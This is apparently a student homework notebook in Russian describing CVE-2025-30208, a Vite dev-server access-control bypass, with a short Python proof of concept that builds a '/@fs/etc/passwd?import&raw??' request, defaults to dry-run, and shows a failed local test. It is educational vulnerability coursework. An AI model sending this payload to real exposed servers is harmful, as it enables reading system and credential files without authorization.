# ДЗ №10

# CVE-2025-30208

## Reference
https://nvd.nist.gov/vuln/detail/CVE-2025-30208

## Description
В Vite существует обход механизма ограничения доступа @fs: добавление ?raw?? или ?import&raw?? к URL позволяет обойти deny/allow-list и получить содержимое произвольного файла, если dev-сервер доступен по сети (например, запущен с --host). В версиях 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10 проблема исправлена.

## POC

In [ ]:
pip install requests

In [6]:
import requests
from urllib.parse import urljoin

In [12]:
BASE_URL = "http://127.0.0.1:5173"
TARGET_FILE = "/etc/passwd"
DRY_RUN = True  # False — реально отправит HTTP-запрос

In [8]:
def poc_build_url(base_url: str, target_file: str) -> str:
    """
    Конструирует URL с попыткой чтения файла: /@fs/<absolute_path>?import&raw??
    """

    path = f"/@fs{target_file}"
    payload = "?import&raw??"

    return urljoin(base_url.rstrip("/") + "/", path.lstrip("/")) + payload

In [11]:
poc_url = poc_build_url(BASE_URL, TARGET_FILE)

if DRY_RUN:
    print("[...] Dry-run: запрос не отправлялся.")
else:
    try:
        r = requests.get(poc_url, timeout=5)
        print(f"HTTP status: {r.status_code}")

        if r.status_code == 200 and r.text.strip():
            print("[+] Потенциальная уязвимость: сервер вернул контент.")
            print("Часть ответа:")
            print(r.text[:200])
        else:
            print("[-] Уязвимость не подтверждена.")

    except requests.RequestException as e:
        print(f"[!] Ошибка сети/запроса: {e}")

HTTP status: 502
[-] Уязвимость не подтверждена.


## Чек-лист самопроверки
- Уязвимость описана корректно: указан CVE, краткое описание ✓
- Написан PoC-скрипт, эмулирующий использование уязвимости (имитация запроса или взаимодействия) ✓
- Добавлен вывод результата или сообщение о потенциальной атаке ✓
- На учебной платформе прикреплена ссылка на GitHub-репозиторий с кодом ✓
- Репозиторий по ссылке доступен для просмотра другим пользователям, название репозитория содержит фамилию и имя студента, номер домашнего задания ✓